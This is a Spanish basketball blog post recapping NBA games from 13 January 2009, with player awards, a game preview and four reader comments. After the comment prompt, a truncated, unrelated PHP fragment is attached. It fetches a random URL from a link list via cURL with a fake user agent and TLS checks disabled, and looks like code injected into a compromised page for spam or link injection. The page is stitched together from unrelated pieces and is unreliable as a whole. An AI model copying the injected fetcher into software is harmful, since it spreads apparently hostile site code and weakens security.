La crónica (13/1/2009)

14 de January de 2009 por MagicJohnson32

La madrugada del martes nos dejó siete partidos en los que todos los favoritos se llevaron la victoria. ¿Todos? ¡No! Los Bobcats tumbaron a los Pistons en Auburn Hills con un parcial de 9-0 en los últimos 3 minutos culminado por la canasta ganadora de Felton en el último segundo. En los últimos 8:30 de partido, Detroit anotó cuatro puntos, todos ellos de tiro libre. Este dato y el raquítico 80-78 final habrán hecho de Larry Brown la persona más feliz del mundo.kobethree

Más puntos pero la misma igualdad hubo en otros pabellones. Por ejemplo, en el Pepsi Center, donde los Nuggets vencieron a los Mavs pese al estadillo ofensivo de Nowitzki, autor de 44 puntos y 14 rebotes. El triunfo se fundamentó en la sorprendente actuación de Chris Birdman Andersen y en una protestada falta de Jason Terry sobre Billups, cuyos tiros libres desequilibraron el marcador a 2 segundos para el final. También en el Toyota Center, en el que hizo falta un lejano triple de Kobe Bryant a falta de 27 segundos para que los Lakers se impusieran a unos Rockets sin McGrady ni Artest y que en la jugada previa se habían puesto por delante con otro triple de Battier. O en el Target Center de Minnesota, donde los errores en los últimos minutos condenaron al equipo local ante unos Heat que tiraron del de siempre. O en el US Airways de Phoenix, donde Suns y Hawks empataban a 98 a dos minutos para el final; entonces, Nash y Amare acertaron mientras que Bibby y Joe Johnson erraron, con lo que el triunfo se quedó en Arizona.

Bastante más fácil lo tuvieron Cavs y Magic, que prolongaron así sus respectivas rachas con dos cómodas victorias a domicilio. Cleveland logró su 30º triunfo de la temporada con triple doble de LeBron ante unos Grizzlies en los que destacó Lowry. Y Orlando se dio un fiestón a costa de los Kings, que encajaron la cifra récord de 23 triples: 5 de Nelson, 4 de Redick, 4 de Bogans, 3 de Turkoglu, 3 de Rashard… Howard, por su parte, se limitó a aplastar a Brad Miller en los tres cuartos que disputó.

lebrongrizzPREMIOS

MVP: 30 puntos, 11 rebotes, 10 asistencias, 3 robos y 1 tapón. LeBron James dejó su tarjeta de visita en Memphis con su segundo triple doble de la temporada.

El rookie: Los 14 puntos, 7 rebotes y 2 asistencias de Michael Beasley resultaron suficientes como para merecer el premio al mejor debutante de la pasada noche.

La sorpresa: Von Wafer, con 23 puntos y 10 de 14 en tiros ante uno de sus ex equipos, los Lakers, era el gran candidato al premio de no ser porque Darius Miles anotó sus primeros puntos desde el 15 de abril de 2006. Fueron 13 puntos en los minutos de la basura. Seguro que en Portland lo están celebrando por todo lo alto. Tampoco hay que olvidar a Chris Andersen, que anotó 15 puntos con 7 de 8 en tiros, incluyendo un triple desde el centro de la pista, además de 10 rebotes, 3 robos y 2 tapones.dirkkenyon

La decepción: El 4 de 21 en tiros de Joe Johnson o los 4 puntos con 1 de 7 en tiros de Mike Miller podrían valer, pero JR Smith hizo méritos de sobra con su 1 de 14 en tiros. El premio colectivo es para todos los jugadores del quinteto titular de los Mavs que no se llaman Dirk. Entre Kidd, Wright, Dampier y Green anotaron 22 puntos con 8 de 29 en tiros de campo.

El mayor esfuerzo en vano: No hay duda. Dirk Nowitzki se salió en Denver pero no valió con su 15 de 26 en tiros de campo, 12 de 12  en libres, para un total de 44 puntos y 14 rebotes.

Razones para trasnochar

La próxima madrugada presenta 11 partidos. De todos ellos, nuestros motivos para trasnochar se concentran en…

Lakers @ Spurs (a las 3:00, horario peninsular). Las dos franquicias que se han repartido el dominio del Oeste durante la última década se enfrentan por primera vez desde que los angelinos eliminasen a los texanos en las pasadas Finales de Conferencia. Los Lakers han mostrado algunos signos de debilidad pero pese a ello y la acumulación de bajas (la última de ellas, Sasha Vujacic) han ganado 10 de sus 11 últimos partidos. Los Spurs, por su parte, vienen de perder en casa ante Orlando Magic y no está mostrando su habitual solidez como local. Pero jkiddcpaulDuncan, Parker, Ginóbili y compañía se presentan como uno de los más duros rivales posibles para unos Lakers que 24 horas antes lucharon lo indecible para ganar en Houston.

Y el jugador al que recomendamos seguir de cerca esta noche es…

Chris Paul. ¿Recuerdan el debut de Jason Kidd en su actual etapa con los Mavs? Fue el pasado 20 de febrero, en New Orleans. Aquel día, Chris Paul le pasó por encima con 31 puntos, 11 asistencias, 9 recuperaciones y 5 rebotes. Posteriormente, ambos equipos se enfrentaron en primera ronda de los Playoffs, y Paul volvió a exhibirse,  incluyendo la consecución de su primer triple doble en el quinto y definitivo partido de la serie. Esta noche a las 2:30 horas los Hornets visitan Dallas. Que tiemble Kidd, que tiemblen los Mavs.

Acabamos con las 10 mejores acciones de la pasada madrugada:

Comenta

4 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    El partido de Kobe fue flojísimo, estuvo mucho mas pendiente de los arbitros que de cualquier otra cosa, defendió mal y atacó peor, al final metió ese canastón y con eso parece que lo arregla todo, decepcionante su actitud ayer.

    Ariza y Odom funcionaron bien, Gasol y Bynum grises, afortunadamente bastó para ganar.

      Citar

  2. couxe dice:
    #2

    Juas… menudo paseito se da Warrick en la jugada nº5… definición de pasos en un highlight…

      Citar

  3. kantonyo dice:
    #3

    Couxe tienes toda la razon….. por lo menos ha dado 5 pasos…flipante!!

    jajajaja

      Citar

  4. Olafur dice:
    #4

    Yo es que no me explico como en un equipo con Gasol, Bynum y Odom de apoyos, Kobe se tire 32 tiros

    Eso si peaso de triplaco

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>